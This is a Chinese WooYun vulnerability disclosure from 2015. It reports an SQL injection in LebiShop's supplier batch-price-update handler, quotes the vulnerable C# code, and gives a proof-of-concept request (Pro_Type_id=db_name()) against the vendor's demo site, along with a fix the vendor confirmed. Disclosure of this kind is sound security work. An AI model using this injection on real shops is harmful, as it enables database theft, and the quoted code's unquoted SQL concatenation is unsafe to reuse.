当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092924

漏洞标题:LebiShop商城系统最新版SQL注入五

相关厂商:www.lebi.cn

漏洞作者: xfkxfk

提交时间:2015-01-23 15:34

修复时间:2015-04-23 15:36

公开时间:2015-04-23 15:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-23: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向第三方安全合作伙伴开放
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

LebiShop商城系统最新版SQL注入五

详细说明:

LebiShop商城系统最新版SQL注入一处
文件Shop.supplier.Ajax.Ajax_product

// Shop.supplier.Ajax.Ajax_product
public void Product_Batch_Price_Update()
{
if (!base.Power("supplier_product_batch_price", "批量调价"))
{
base.AjaxNoPower();
return;
}
string step = RequestTool.RequestString("step");
string dateFrom = RequestTool.RequestString("dateFrom");
string dateTo = RequestTool.RequestString("dateTo");
string Pro_Type_id = RequestTool.RequestString("Pro_Type_id");
int brand = RequestTool.RequestInt("brand", 0);
int tag = RequestTool.RequestInt("tag", 0);
int price_markettype = RequestTool.RequestInt("price_markettype", 0);
int price_marketvalue = RequestTool.RequestInt("price_marketvalue", 0);
int price_marketadd = RequestTool.RequestInt("price_marketadd", 0);
int price_costtype = RequestTool.RequestInt("price_costtype", 0);
int price_costvalue = RequestTool.RequestInt("price_costvalue", 0);
int price_costadd = RequestTool.RequestInt("price_costadd", 0);
int pricetype = RequestTool.RequestInt("pricetype", 0);
int pricevalue = RequestTool.RequestInt("pricevalue", 0);
int priceadd = RequestTool.RequestInt("priceadd", 0);
int addtype = RequestTool.RequestInt("addtype", 0);
int addvalue = RequestTool.RequestInt("addvalue", 0);
int reducetype = RequestTool.RequestInt("reducetype", 0);
int reducevalue = RequestTool.RequestInt("reducevalue", 0);
string mes = "";
string where = "1=1";
if (dateFrom != "" && dateTo != "")
{
string text = where;
where = string.Concat(new string[]
{
text,
" and (datediff(d,Time_Add,'",
dateFrom,
"')<=0 and datediff(d,Time_Add,'",
dateTo,
"')>=0)"
});
string text2 = mes;
mes = string.Concat(new string[]
{
text2,
"上架日期",
dateFrom,
"-",
dateTo,
";"
});
}
if (Pro_Type_id != "")
{
where = where + " and Pro_Type_id in (" + EX_Product.Categoryid(Pro_Type_id) + ")";
mes = mes + "商品分类" + Pro_Type_id + ";";
}


参数Pro_Type_id通过RequestTool.RequestString("Pro_Type_id")获取
在RequestTool.RequestString方法中只进行了单引号的转换

// Shop.Tools.RequestTool
public static string RequestString(string nKey, string def)
{
string ojb = HttpContext.Current.Request.QueryString[nKey];
if (ojb != null)
{
return StringTool.InjectFiltrate(ojb.Trim());
}
ojb = HttpContext.Current.Request.Form[nKey];
if (ojb != null)
{
return StringTool.InjectFiltrate(ojb.Trim());
}
return def;
}
// Shop.Tools.StringTool
public static string InjectFiltrate(string str)
{
if (!StringTool.IsSafeSqlString(str))
{
str = str.Replace("'", "&#180;");
}
return str;
}


然后Pro_Type_id进入了EX_Product.Categoryid方法,跟进

// Shop.Bussiness.EX_Product
public static string Categoryid(string id)
{
string str = id.ToString();
List<Lebi_Pro_Type> ts = B_Lebi_Pro_Type.GetList("Parentid=" + id + " and IsShow = 1", "Sort desc");
foreach (Lebi_Pro_Type t in ts)
{
str = str + "," + EX_Product.Categoryid(string.Concat(t.id));
}
return str;
}


然后Pro_Type_id最后进入了B_Lebi_Pro_Type.GetList方法,且没有使用单引号保护

漏洞证明:

官方demo演示
报出当前数据库

http://plus.demo.lebi.cn/supplier/ajax/ajax_product.aspx?__Action=Product_Batch_Price_Update&url=/
Pro_Type_id=db_name()


1.png


报出servername,服务器主机名

2.png


sqlmap即可跑出数据

修复方案:

使用RequestTool.RequestInt或者添加单引号保护变量

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-26 15:10

厂商回复:

已统一修复SQL漏洞,感谢

最新状态:

暂无